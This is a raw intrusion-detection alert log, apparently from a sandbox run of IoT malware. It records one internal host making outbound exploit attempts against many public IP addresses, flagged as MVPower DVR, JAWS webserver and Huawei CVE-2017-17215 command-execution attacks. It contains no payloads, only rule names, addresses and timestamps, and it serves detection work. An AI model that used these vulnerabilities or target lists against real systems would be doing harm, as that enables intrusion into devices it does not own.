                                                            192.168.2.23184.51.99.17551534802025883 01/26/24-15:32:37.067103TCP2025883ET EXPLOIT MVPower DVR Shell UCE5153480192.168.2.23184.51.99.175
                                                            192.168.2.23108.138.167.14446376802025883 01/26/24-15:31:23.425510TCP2025883ET EXPLOIT MVPower DVR Shell UCE4637680192.168.2.23108.138.167.144
                                                            192.168.2.2338.47.144.16346026802030092 01/26/24-15:31:52.998716TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4602680192.168.2.2338.47.144.163
                                                            192.168.2.2318.66.222.15547870802030092 01/26/24-15:31:41.789331TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4787080192.168.2.2318.66.222.155
                                                            192.168.2.2323.79.19.10349378802025883 01/26/24-15:31:26.735340TCP2025883ET EXPLOIT MVPower DVR Shell UCE4937880192.168.2.2323.79.19.103
                                                            192.168.2.2313.239.176.6832990802025883 01/26/24-15:31:49.632193TCP2025883ET EXPLOIT MVPower DVR Shell UCE3299080192.168.2.2313.239.176.68
                                                            192.168.2.2377.79.225.8552098802030092 01/26/24-15:32:53.764720TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5209880192.168.2.2377.79.225.85
                                                            192.168.2.23103.123.4.8037724802030092 01/26/24-15:31:20.789732TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3772480192.168.2.23103.123.4.80
                                                            192.168.2.23138.3.212.12138624802025883 01/26/24-15:32:23.948314TCP2025883ET EXPLOIT MVPower DVR Shell UCE3862480192.168.2.23138.3.212.121
                                                            192.168.2.23138.4.254.15859294802030092 01/26/24-15:32:04.618046TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5929480192.168.2.23138.4.254.158
                                                            192.168.2.2323.62.79.23948618802025883 01/26/24-15:32:07.603043TCP2025883ET EXPLOIT MVPower DVR Shell UCE4861880192.168.2.2323.62.79.239
                                                            192.168.2.23149.28.12.20146238802025883 01/26/24-15:32:41.674136TCP2025883ET EXPLOIT MVPower DVR Shell UCE4623880192.168.2.23149.28.12.201
                                                            192.168.2.23198.46.203.3945072802025883 01/26/24-15:32:47.575690TCP2025883ET EXPLOIT MVPower DVR Shell UCE4507280192.168.2.23198.46.203.39
                                                            192.168.2.2383.167.179.936342802030092 01/26/24-15:32:32.574465TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3634280192.168.2.2383.167.179.9
                                                            192.168.2.23156.77.139.5636632372152835222 01/26/24-15:32:52.336505TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3663237215192.168.2.23156.77.139.56
                                                            192.168.2.2335.183.233.14441518802025883 01/26/24-15:32:21.506383TCP2025883ET EXPLOIT MVPower DVR Shell UCE4151880192.168.2.2335.183.233.144
                                                            192.168.2.2334.110.219.24053370802030092 01/26/24-15:31:35.621311TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5337080192.168.2.2334.110.219.240
                                                            192.168.2.23192.185.224.21638158802030092 01/26/24-15:31:30.592293TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3815880192.168.2.23192.185.224.216
                                                            192.168.2.2318.169.247.8253346802030092 01/26/24-15:31:33.204599TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5334680192.168.2.2318.169.247.82
                                                            192.168.2.23192.169.179.3658894802025883 01/26/24-15:31:27.638300TCP2025883ET EXPLOIT MVPower DVR Shell UCE5889480192.168.2.23192.169.179.36
                                                            192.168.2.2338.53.37.23046536802030092 01/26/24-15:32:47.324847TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4653680192.168.2.2338.53.37.230
                                                            192.168.2.23160.124.107.20050914802025883 01/26/24-15:32:58.726118TCP2025883ET EXPLOIT MVPower DVR Shell UCE5091480192.168.2.23160.124.107.200
                                                            192.168.2.23154.95.217.17434028802025883 01/26/24-15:32:19.891483TCP2025883ET EXPLOIT MVPower DVR Shell UCE3402880192.168.2.23154.95.217.174
                                                            192.168.2.23100.40.152.3447214802025883 01/26/24-15:31:26.761872TCP2025883ET EXPLOIT MVPower DVR Shell UCE4721480192.168.2.23100.40.152.34
                                                            192.168.2.2393.184.250.233602802025883 01/26/24-15:32:56.621551TCP2025883ET EXPLOIT MVPower DVR Shell UCE3360280192.168.2.2393.184.250.2
                                                            192.168.2.2381.198.251.19750352802025883 01/26/24-15:32:06.972423TCP2025883ET EXPLOIT MVPower DVR Shell UCE5035280192.168.2.2381.198.251.197
                                                            192.168.2.2318.235.53.6041494802030092 01/26/24-15:32:06.564301TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4149480192.168.2.2318.235.53.60
                                                            192.168.2.23104.116.119.10733370802025883 01/26/24-15:32:18.744839TCP2025883ET EXPLOIT MVPower DVR Shell UCE3337080192.168.2.23104.116.119.107
                                                            192.168.2.232.17.206.8348860802030092 01/26/24-15:32:40.082111TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4886080192.168.2.232.17.206.83
                                                            192.168.2.2366.45.251.8637802802030092 01/26/24-15:31:36.579696TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3780280192.168.2.2366.45.251.86
                                                            192.168.2.23178.128.201.21958508802025883 01/26/24-15:32:47.668263TCP2025883ET EXPLOIT MVPower DVR Shell UCE5850880192.168.2.23178.128.201.219
                                                            192.168.2.232.37.191.14334212802030092 01/26/24-15:32:33.834444TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3421280192.168.2.232.37.191.143
                                                            192.168.2.2366.228.50.1543950802025883 01/26/24-15:31:33.008718TCP2025883ET EXPLOIT MVPower DVR Shell UCE4395080192.168.2.2366.228.50.15
                                                            192.168.2.2365.1.219.12134742802030092 01/26/24-15:32:31.046646TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3474280192.168.2.2365.1.219.121
                                                            192.168.2.23171.236.63.23344144802025883 01/26/24-15:31:16.333458TCP2025883ET EXPLOIT MVPower DVR Shell UCE4414480192.168.2.23171.236.63.233
                                                            192.168.2.23162.14.101.3338388802030092 01/26/24-15:31:26.997595TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3838880192.168.2.23162.14.101.33
                                                            192.168.2.2388.157.120.5760410802025883 01/26/24-15:32:23.859066TCP2025883ET EXPLOIT MVPower DVR Shell UCE6041080192.168.2.2388.157.120.57
                                                            192.168.2.23213.29.44.22540388802030092 01/26/24-15:32:25.756351TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4038880192.168.2.23213.29.44.225
                                                            192.168.2.2345.143.98.8452284802030092 01/26/24-15:31:54.084287TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5228480192.168.2.2345.143.98.84
                                                            192.168.2.23151.244.61.7554984802030092 01/26/24-15:32:41.876739TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5498480192.168.2.23151.244.61.75
                                                            192.168.2.2320.253.71.232906802030092 01/26/24-15:32:49.944359TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3290680192.168.2.2320.253.71.2
                                                            192.168.2.23185.232.128.13349740802025883 01/26/24-15:32:01.702135TCP2025883ET EXPLOIT MVPower DVR Shell UCE4974080192.168.2.23185.232.128.133
                                                            192.168.2.2354.79.81.18745534802030092 01/26/24-15:31:44.904507TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4553480192.168.2.2354.79.81.187
                                                            192.168.2.23197.246.45.20139958372152829579 01/26/24-15:32:11.998768TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3995837215192.168.2.23197.246.45.201
                                                            192.168.2.2313.55.166.21340060802025883 01/26/24-15:32:35.983520TCP2025883ET EXPLOIT MVPower DVR Shell UCE4006080192.168.2.2313.55.166.213
                                                            192.168.2.2396.16.22.25458896802030092 01/26/24-15:33:00.563016TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5889680192.168.2.2396.16.22.254
                                                            192.168.2.23210.243.112.15758784802025883 01/26/24-15:31:51.438281TCP2025883ET EXPLOIT MVPower DVR Shell UCE5878480192.168.2.23210.243.112.157
                                                            192.168.2.2354.243.167.15060322802025883 01/26/24-15:32:15.823027TCP2025883ET EXPLOIT MVPower DVR Shell UCE6032280192.168.2.2354.243.167.150
                                                            192.168.2.23172.66.135.15451118802030092 01/26/24-15:32:14.830379TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5111880192.168.2.23172.66.135.154
                                                            192.168.2.23104.68.14.17548588802025883 01/26/24-15:32:21.661776TCP2025883ET EXPLOIT MVPower DVR Shell UCE4858880192.168.2.23104.68.14.175
                                                            192.168.2.23104.90.119.1242320802025883 01/26/24-15:32:25.639118TCP2025883ET EXPLOIT MVPower DVR Shell UCE4232080192.168.2.23104.90.119.12
                                                            192.168.2.2320.241.66.6740198802025883 01/26/24-15:32:15.705873TCP2025883ET EXPLOIT MVPower DVR Shell UCE4019880192.168.2.2320.241.66.67
                                                            192.168.2.23223.6.157.951858802030092 01/26/24-15:32:36.362831TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5185880192.168.2.23223.6.157.9
                                                            192.168.2.2323.77.27.11560260802030092 01/26/24-15:31:54.025906TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution6026080192.168.2.2323.77.27.115
                                                            192.168.2.23156.47.167.10943070802025883 01/26/24-15:31:58.381828TCP2025883ET EXPLOIT MVPower DVR Shell UCE4307080192.168.2.23156.47.167.109
                                                            192.168.2.23162.0.233.13637134802025883 01/26/24-15:32:23.725294TCP2025883ET EXPLOIT MVPower DVR Shell UCE3713480192.168.2.23162.0.233.136
                                                            192.168.2.23210.71.232.17739778802030092 01/26/24-15:31:21.012973TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3977880192.168.2.23210.71.232.177
                                                            192.168.2.23147.154.142.11933900802025883 01/26/24-15:32:58.863656TCP2025883ET EXPLOIT MVPower DVR Shell UCE3390080192.168.2.23147.154.142.119
                                                            192.168.2.23165.95.154.15844052802025883 01/26/24-15:31:18.585023TCP2025883ET EXPLOIT MVPower DVR Shell UCE4405280192.168.2.23165.95.154.158
                                                            192.168.2.23196.51.15.16032854802025883 01/26/24-15:32:47.842051TCP2025883ET EXPLOIT MVPower DVR Shell UCE3285480192.168.2.23196.51.15.160
                                                            192.168.2.2352.142.126.8859246802030092 01/26/24-15:31:04.732287TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5924680192.168.2.2352.142.126.88
                                                            192.168.2.2323.65.32.13337420802030092 01/26/24-15:31:22.785357TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3742080192.168.2.2323.65.32.133
                                                            192.168.2.2343.248.169.5059858802030092 01/26/24-15:31:50.006489TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5985880192.168.2.2343.248.169.50
                                                            192.168.2.23104.16.140.12633278802030092 01/26/24-15:32:18.575264TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3327880192.168.2.23104.16.140.126
                                                            192.168.2.2352.85.131.24559562802025883 01/26/24-15:31:47.589436TCP2025883ET EXPLOIT MVPower DVR Shell UCE5956280192.168.2.2352.85.131.245
                                                            192.168.2.2338.14.3.12152026802030092 01/26/24-15:32:49.343724TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5202680192.168.2.2338.14.3.121
                                                            192.168.2.23107.142.58.6338674802025883 01/26/24-15:32:30.553653TCP2025883ET EXPLOIT MVPower DVR Shell UCE3867480192.168.2.23107.142.58.63
                                                            192.168.2.23120.78.196.16559336802025883 01/26/24-15:31:13.062668TCP2025883ET EXPLOIT MVPower DVR Shell UCE5933680192.168.2.23120.78.196.165
                                                            192.168.2.23154.80.190.13136832802030092 01/26/24-15:31:12.938827TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3683280192.168.2.23154.80.190.131
                                                            192.168.2.2323.77.215.3955030802025883 01/26/24-15:31:35.402143TCP2025883ET EXPLOIT MVPower DVR Shell UCE5503080192.168.2.2323.77.215.39
                                                            192.168.2.23184.50.79.2339916802025883 01/26/24-15:31:20.743260TCP2025883ET EXPLOIT MVPower DVR Shell UCE3991680192.168.2.23184.50.79.23
                                                            192.168.2.2313.33.79.19236726802025883 01/26/24-15:31:33.398550TCP2025883ET EXPLOIT MVPower DVR Shell UCE3672680192.168.2.2313.33.79.192
                                                            192.168.2.23124.198.30.11542388802025883 01/26/24-15:32:09.698068TCP2025883ET EXPLOIT MVPower DVR Shell UCE4238880192.168.2.23124.198.30.115
                                                            192.168.2.23123.56.30.12146802802030092 01/26/24-15:31:52.000684TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4680280192.168.2.23123.56.30.121
                                                            192.168.2.23156.241.71.5842036372152835222 01/26/24-15:32:57.468846TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4203637215192.168.2.23156.241.71.58
                                                            192.168.2.2338.53.62.16238764802030092 01/26/24-15:32:58.590976TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3876480192.168.2.2338.53.62.162
                                                            192.168.2.2352.45.114.19360734802025883 01/26/24-15:32:44.623354TCP2025883ET EXPLOIT MVPower DVR Shell UCE6073480192.168.2.2352.45.114.193
                                                            192.168.2.23212.36.196.939926802030092 01/26/24-15:31:01.231763TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3992680192.168.2.23212.36.196.9
                                                            192.168.2.23116.202.54.2452170802025883 01/26/24-15:33:01.962315TCP2025883ET EXPLOIT MVPower DVR Shell UCE5217080192.168.2.23116.202.54.24
                                                            192.168.2.2354.165.187.10039016802030092 01/26/24-15:33:01.778861TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3901680192.168.2.2354.165.187.100
                                                            192.168.2.23154.38.124.18233456802025883 01/26/24-15:32:19.617457TCP2025883ET EXPLOIT MVPower DVR Shell UCE3345680192.168.2.23154.38.124.182
                                                            192.168.2.2386.22.49.25350780802030092 01/26/24-15:32:21.592093TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5078080192.168.2.2386.22.49.253
                                                            192.168.2.238.209.240.1343058802025883 01/26/24-15:31:18.206989TCP2025883ET EXPLOIT MVPower DVR Shell UCE4305880192.168.2.238.209.240.13
                                                            192.168.2.2393.213.121.25459160802030092 01/26/24-15:31:04.539128TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5916080192.168.2.2393.213.121.254
                                                            192.168.2.23172.103.183.22433132802025883 01/26/24-15:31:41.395483TCP2025883ET EXPLOIT MVPower DVR Shell UCE3313280192.168.2.23172.103.183.224
                                                            192.168.2.2354.195.88.16833964802030092 01/26/24-15:31:27.050988TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3396480192.168.2.2354.195.88.168
                                                            192.168.2.23134.65.235.16534716802030092 01/26/24-15:32:23.607670TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3471680192.168.2.23134.65.235.165
                                                            192.168.2.23193.178.43.2245548802030092 01/26/24-15:32:42.820275TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4554880192.168.2.23193.178.43.22
                                                            192.168.2.2323.63.87.4949220802025883 01/26/24-15:33:01.955923TCP2025883ET EXPLOIT MVPower DVR Shell UCE4922080192.168.2.2323.63.87.49
                                                            192.168.2.23104.22.63.14333402802030092 01/26/24-15:31:55.603784TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3340280192.168.2.23104.22.63.143
                                                            192.168.2.2345.183.19.21936238802025883 01/26/24-15:32:15.022014TCP2025883ET EXPLOIT MVPower DVR Shell UCE3623880192.168.2.2345.183.19.219
                                                            192.168.2.2313.225.26.17856352802030092 01/26/24-15:31:49.538944TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5635280192.168.2.2313.225.26.178
                                                            192.168.2.2334.149.45.23655346802030092 01/26/24-15:31:47.560632TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5534680192.168.2.2334.149.45.236
                                                            192.168.2.23159.69.144.11053778802030092 01/26/24-15:32:48.799773TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5377880192.168.2.23159.69.144.110
                                                            192.168.2.2351.132.35.11638754802030092 01/26/24-15:31:44.773755TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3875480192.168.2.2351.132.35.116
                                                            192.168.2.2341.47.185.5860580372152835222 01/26/24-15:31:53.094755TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6058037215192.168.2.2341.47.185.58
                                                            192.168.2.23190.175.16.10033660802030092 01/26/24-15:32:42.003037TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3366080192.168.2.23190.175.16.100
                                                            192.168.2.2379.132.142.4560932802025883 01/26/24-15:31:04.250547TCP2025883ET EXPLOIT MVPower DVR Shell UCE6093280192.168.2.2379.132.142.45
                                                            192.168.2.23156.241.15.8642302372152835222 01/26/24-15:33:01.150691TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4230237215192.168.2.23156.241.15.86
                                                            192.168.2.2318.165.59.19938728802030092 01/26/24-15:32:01.702335TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3872880192.168.2.2318.165.59.199
                                                            192.168.2.2344.211.68.17335700802025883 01/26/24-15:31:43.857382TCP2025883ET EXPLOIT MVPower DVR Shell UCE3570080192.168.2.2344.211.68.173
                                                            192.168.2.2334.49.218.22734324802030092 01/26/24-15:31:51.202892TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3432480192.168.2.2334.49.218.227
                                                            192.168.2.23199.119.73.2160650802025883 01/26/24-15:32:21.518956TCP2025883ET EXPLOIT MVPower DVR Shell UCE6065080192.168.2.23199.119.73.21
                                                            192.168.2.23190.166.87.16747940802030092 01/26/24-15:31:12.177184TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4794080192.168.2.23190.166.87.167
                                                            192.168.2.23107.172.253.17556648802030092 01/26/24-15:31:26.762471TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5664880192.168.2.23107.172.253.175
                                                            192.168.2.23154.93.247.23160758802025883 01/26/24-15:31:27.233231TCP2025883ET EXPLOIT MVPower DVR Shell UCE6075880192.168.2.23154.93.247.231
                                                            192.168.2.2369.58.6.20547720802025883 01/26/24-15:32:46.232134TCP2025883ET EXPLOIT MVPower DVR Shell UCE4772080192.168.2.2369.58.6.205
                                                            192.168.2.2338.177.201.847482802030092 01/26/24-15:32:30.581668TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4748280192.168.2.2338.177.201.8
                                                            192.168.2.23121.144.178.3158814802025883 01/26/24-15:31:12.317058TCP2025883ET EXPLOIT MVPower DVR Shell UCE5881480192.168.2.23121.144.178.31
                                                            192.168.2.23167.82.74.11251752802025883 01/26/24-15:32:04.521738TCP2025883ET EXPLOIT MVPower DVR Shell UCE5175280192.168.2.23167.82.74.112
                                                            192.168.2.2354.86.197.21752968802025883 01/26/24-15:32:32.488871TCP2025883ET EXPLOIT MVPower DVR Shell UCE5296880192.168.2.2354.86.197.217
                                                            192.168.2.2338.173.86.11947328802030092 01/26/24-15:31:51.388493TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4732880192.168.2.2338.173.86.119
                                                            192.168.2.2335.169.65.16252674802025883 01/26/24-15:31:58.502198TCP2025883ET EXPLOIT MVPower DVR Shell UCE5267480192.168.2.2335.169.65.162
                                                            192.168.2.2338.238.9.3533144802025883 01/26/24-15:31:17.425409TCP2025883ET EXPLOIT MVPower DVR Shell UCE3314480192.168.2.2338.238.9.35
                                                            192.168.2.2318.66.134.20444984802025883 01/26/24-15:31:55.571417TCP2025883ET EXPLOIT MVPower DVR Shell UCE4498480192.168.2.2318.66.134.204
                                                            192.168.2.2347.107.144.24648474802030092 01/26/24-15:31:30.798057TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4847480192.168.2.2347.107.144.246
                                                            192.168.2.2347.99.247.17737488802030092 01/26/24-15:32:45.240841TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3748880192.168.2.2347.99.247.177
                                                            192.168.2.2387.99.180.17049486802030092 01/26/24-15:32:47.668429TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4948680192.168.2.2387.99.180.170
                                                            192.168.2.2354.79.111.1960996802025883 01/26/24-15:32:33.990530TCP2025883ET EXPLOIT MVPower DVR Shell UCE6099680192.168.2.2354.79.111.19
                                                            192.168.2.2314.199.230.22159086802025883 01/26/24-15:31:36.005046TCP2025883ET EXPLOIT MVPower DVR Shell UCE5908680192.168.2.2314.199.230.221
                                                            192.168.2.23156.241.13.3739998372152829579 01/26/24-15:32:46.480373TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3999837215192.168.2.23156.241.13.37
                                                            192.168.2.2338.165.105.3057168802025883 01/26/24-15:32:38.806869TCP2025883ET EXPLOIT MVPower DVR Shell UCE5716880192.168.2.2338.165.105.30
                                                            192.168.2.23204.54.40.18351026802030092 01/26/24-15:32:37.342241TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5102680192.168.2.23204.54.40.183
                                                            192.168.2.2362.29.79.232852802030092 01/26/24-15:31:55.883506TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3285280192.168.2.2362.29.79.2
                                                            192.168.2.23223.252.6.2145092802030092 01/26/24-15:32:37.032412TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4509280192.168.2.23223.252.6.21
                                                            192.168.2.23103.69.193.7345732802025883 01/26/24-15:32:29.071266TCP2025883ET EXPLOIT MVPower DVR Shell UCE4573280192.168.2.23103.69.193.73
                                                            192.168.2.2318.65.143.7146658802030092 01/26/24-15:31:58.566964TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4665880192.168.2.2318.65.143.71
                                                            192.168.2.2354.169.210.7344226802030092 01/26/24-15:32:56.420174TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4422680192.168.2.2354.169.210.73
                                                            192.168.2.23208.69.96.8050392802025883 01/26/24-15:31:23.456047TCP2025883ET EXPLOIT MVPower DVR Shell UCE5039280192.168.2.23208.69.96.80
                                                            192.168.2.23197.234.61.13656368372152835222 01/26/24-15:32:26.903685TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5636837215192.168.2.23197.234.61.136
                                                            192.168.2.2318.165.105.16133670802030092 01/26/24-15:32:01.343654TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3367080192.168.2.2318.165.105.161
                                                            192.168.2.2335.213.160.22451902802025883 01/26/24-15:32:57.098575TCP2025883ET EXPLOIT MVPower DVR Shell UCE5190280192.168.2.2335.213.160.224
                                                            192.168.2.2399.83.214.2360542802025883 01/26/24-15:31:41.398087TCP2025883ET EXPLOIT MVPower DVR Shell UCE6054280192.168.2.2399.83.214.23
                                                            192.168.2.23104.119.82.8756146802030092 01/26/24-15:31:16.948086TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5614680192.168.2.23104.119.82.87
                                                            192.168.2.2388.221.24.1056354802025883 01/26/24-15:31:20.588355TCP2025883ET EXPLOIT MVPower DVR Shell UCE5635480192.168.2.2388.221.24.10
                                                            192.168.2.2323.10.129.13339718802030092 01/26/24-15:32:33.568575TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3971880192.168.2.2323.10.129.133
                                                            192.168.2.2318.118.223.18155768802025883 01/26/24-15:31:35.676752TCP2025883ET EXPLOIT MVPower DVR Shell UCE5576880192.168.2.2318.118.223.181
                                                            192.168.2.23198.143.148.255194802025883 01/26/24-15:31:41.508143TCP2025883ET EXPLOIT MVPower DVR Shell UCE5519480192.168.2.23198.143.148.2
                                                            192.168.2.23107.22.76.4153952802030092 01/26/24-15:32:12.670692TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5395280192.168.2.23107.22.76.41
                                                            192.168.2.23164.92.241.13355232802025883 01/26/24-15:32:09.847930TCP2025883ET EXPLOIT MVPower DVR Shell UCE5523280192.168.2.23164.92.241.133
                                                            192.168.2.2376.164.156.1132940802030092 01/26/24-15:31:01.082396TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3294080192.168.2.2376.164.156.11
                                                            192.168.2.2347.246.10.10051578802025883 01/26/24-15:32:18.896072TCP2025883ET EXPLOIT MVPower DVR Shell UCE5157880192.168.2.2347.246.10.100
                                                            192.168.2.23104.80.232.839126802030092 01/26/24-15:31:55.941031TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3912680192.168.2.23104.80.232.8
                                                            192.168.2.23162.14.120.4537518802030092 01/26/24-15:31:49.711223TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3751880192.168.2.23162.14.120.45
                                                            192.168.2.23155.138.11.2035510802030092 01/26/24-15:32:32.511749TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3551080192.168.2.23155.138.11.20
                                                            192.168.2.23156.250.15.7359280802025883 01/26/24-15:31:19.040568TCP2025883ET EXPLOIT MVPower DVR Shell UCE5928080192.168.2.23156.250.15.73
                                                            192.168.2.2379.120.228.19036614802025883 01/26/24-15:31:55.590446TCP2025883ET EXPLOIT MVPower DVR Shell UCE3661480192.168.2.2379.120.228.190
                                                            192.168.2.2323.13.20.12338938802030092 01/26/24-15:31:26.930377TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3893880192.168.2.2323.13.20.123
                                                            192.168.2.23185.114.96.7050582802025883 01/26/24-15:31:22.833185TCP2025883ET EXPLOIT MVPower DVR Shell UCE5058280192.168.2.23185.114.96.70
                                                            192.168.2.23138.38.41.21651486802030092 01/26/24-15:31:58.449347TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5148680192.168.2.23138.38.41.216
                                                            192.168.2.23116.203.0.3550408802030092 01/26/24-15:32:01.763592TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5040880192.168.2.23116.203.0.35
                                                            192.168.2.23192.145.232.19832932802025883 01/26/24-15:31:18.095689TCP2025883ET EXPLOIT MVPower DVR Shell UCE3293280192.168.2.23192.145.232.198
                                                            192.168.2.2399.84.164.15758968802025883 01/26/24-15:31:52.668950TCP2025883ET EXPLOIT MVPower DVR Shell UCE5896880192.168.2.2399.84.164.157
                                                            192.168.2.23154.177.20.19240328802025883 01/26/24-15:31:30.679568TCP2025883ET EXPLOIT MVPower DVR Shell UCE4032880192.168.2.23154.177.20.192
                                                            192.168.2.2352.7.93.3850156802030092 01/26/24-15:31:55.485744TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5015680192.168.2.2352.7.93.38
                                                            192.168.2.2373.223.88.24932972802025883 01/26/24-15:31:16.960028TCP2025883ET EXPLOIT MVPower DVR Shell UCE3297280192.168.2.2373.223.88.249
                                                            192.168.2.2367.225.246.16446820802030092 01/26/24-15:32:30.553241TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4682080192.168.2.2367.225.246.164
                                                            192.168.2.2364.68.224.6848616802025883 01/26/24-15:31:55.514444TCP2025883ET EXPLOIT MVPower DVR Shell UCE4861680192.168.2.2364.68.224.68
                                                            192.168.2.2338.38.65.23037578802025883 01/26/24-15:33:00.622420TCP2025883ET EXPLOIT MVPower DVR Shell UCE3757880192.168.2.2338.38.65.230
                                                            192.168.2.2323.194.29.14435718802030092 01/26/24-15:31:17.004706TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3571880192.168.2.2323.194.29.144
                                                            192.168.2.23149.202.117.7637802802025883 01/26/24-15:31:12.472984TCP2025883ET EXPLOIT MVPower DVR Shell UCE3780280192.168.2.23149.202.117.76
                                                            192.168.2.2314.245.88.10533686802025883 01/26/24-15:32:34.039201TCP2025883ET EXPLOIT MVPower DVR Shell UCE3368680192.168.2.2314.245.88.105
                                                            192.168.2.23134.73.222.13851042802025883 01/26/24-15:31:58.715162TCP2025883ET EXPLOIT MVPower DVR Shell UCE5104280192.168.2.23134.73.222.138
                                                            192.168.2.23149.62.39.12557276802030092 01/26/24-15:32:32.482019TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5727680192.168.2.23149.62.39.125
                                                            192.168.2.23159.192.157.644384802030092 01/26/24-15:32:36.360354TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4438480192.168.2.23159.192.157.6
                                                            192.168.2.23142.252.201.24755670802025883 01/26/24-15:31:18.623898TCP2025883ET EXPLOIT MVPower DVR Shell UCE5567080192.168.2.23142.252.201.247
                                                            192.168.2.2350.98.58.3954190802030092 01/26/24-15:31:53.687421TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5419080192.168.2.2350.98.58.39
                                                            192.168.2.2364.9.223.3838386802025883 01/26/24-15:33:02.010793TCP2025883ET EXPLOIT MVPower DVR Shell UCE3838680192.168.2.2364.9.223.38
                                                            192.168.2.2396.11.176.8641084802030092 01/26/24-15:32:11.726295TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4108480192.168.2.2396.11.176.86
